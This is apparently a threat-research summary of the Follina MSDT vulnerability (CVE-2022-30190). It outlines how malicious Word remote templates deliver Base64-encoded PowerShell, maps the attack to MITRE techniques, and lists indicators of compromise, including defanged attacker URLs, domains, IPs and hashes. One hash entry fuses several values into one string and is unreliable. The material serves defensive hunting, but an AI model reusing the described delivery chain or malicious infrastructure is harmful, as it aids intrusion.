Threat Research

Hunting Follina

Securonix

Follina (CVE-2022-30190) is a remote-code-execution vulnerability in Microsoft’s MSDT exploited via Word documents that load a remote template containing a payload. Researchers show how attackers used remote templates and base64-encoded PowerShell to run code, and provide hunting methods using VirusTotal, YARA, and VT Grep to uncover more samples. #Follina #MSDT

Keypoints

  • Follina CVE-2022-30190 is a 0-day vulnerability in Microsoft Support Diagnostic Tool (MSDT) that enables remote code execution when MSDT is invoked via the URL protocol from a calling application (e.g., Word).
  • Attacks leverage Word’s remote template feature to link a document with a template that contains arbitrary code to execute.
  • The remote template contains a payload, typically Base64-encoded, which is decoded and executed (e.g., a malicious PowerShell script).
  • Analysts describe a workflow to hunt for new samples using VirusTotal, YARA rules, VT Grep queries, and document-property targeting to find remote templates and related artifacts.
  • Observations split samples into “Before disclosure” and “After disclosure” groups, with PoCs prior to public disclosure and real in-the-wild attacks appearing afterward, often using compromised domains or dynamic hosts (e.g., ngrok, compromised servers).
  • IOCs include multiple file hashes, remote-template URLs, domains (e.g., attend-doha-expo.com), and sample names (e.g., Monkeypox.docx) used in campaigns.
  • The analysis emphasizes ongoing monitoring and threat intelligence as essential to detect evolving Follina variants and related malware families.

MITRE Techniques

  • [T1566.001] Spearphishing Attachment – Word documents loaded with a remote template to execute code via MSDT. Quote: “…a document with a template containing arbitrary code to execute.”
  • [T1203] Exploitation for Client Execution – The MSDT vulnerability can enable remote code execution when invoked via the URL protocol from Word. Quote: “…can enable remote code execution (RCE) when MSDT is invoked using the URL protocol from a calling application, such as Microsoft Word.”
  • [T1105] Ingress Tool Transfer – The remote template is downloaded and fetched by the malicious document. Quote: “The downloaded file is the remote template fetched by the malicious document we are analyzing.”
  • [T1059.001] PowerShell – The remote template yields a PowerShell payload that is executed by the sample. Quote: “the malicious Powershell script executed by the sample.”
  • [T1027] Obfuscated/Compressed Files and Information – The payload in the remote template is Base64-encoded and decoded for execution. Quote: “The remote template content shows what appears to be a Base64-encoded payload. After decoding, we get the malicious Powershell script…”

Indicators of Compromise

  • [SHA-1] – 5757f8027668fc5bdc979df484cabb4c94b5fa3c, 22fa626a3a1eb509a1a14b616d4ec094eb2b8f9a
  • [URL] – hxxps://127.0.0[.]1/testtesttest.html, http://93.115.26[.]76:8000/index.html
  • [IP] – 127.0.0.1, 212.138.130[.]8
  • [Domain] – files.attend-doha-expo[.]com, attend-doha-expo[.]com
  • [FileName] – Monkeypox.docx, testtesttest.html (example in PoC contexts)
  • [Hash] – B22db9ccd50064cbaf5876a4a318ec8eea284585F5978deec22543a301e7ff4e01db950d8f474a4c934561173aba69ff4f7b118181f6c8f467b0695d447139a8cfc9660215bef2230e25885f553ddba8818803f1bd2d2ac66b2e36ccd9971ba85b8901f006727ffda60359236a8029e0b3e8a0fd11c23313
  • [URL] – https://www.cssformats[.]com/o/SDS84Sl.html, https://708b-27-122-14-41.ap.ngrok[.]io/index.html

Read more: https://blog.virustotal.com/2022/08/hunting-follina.html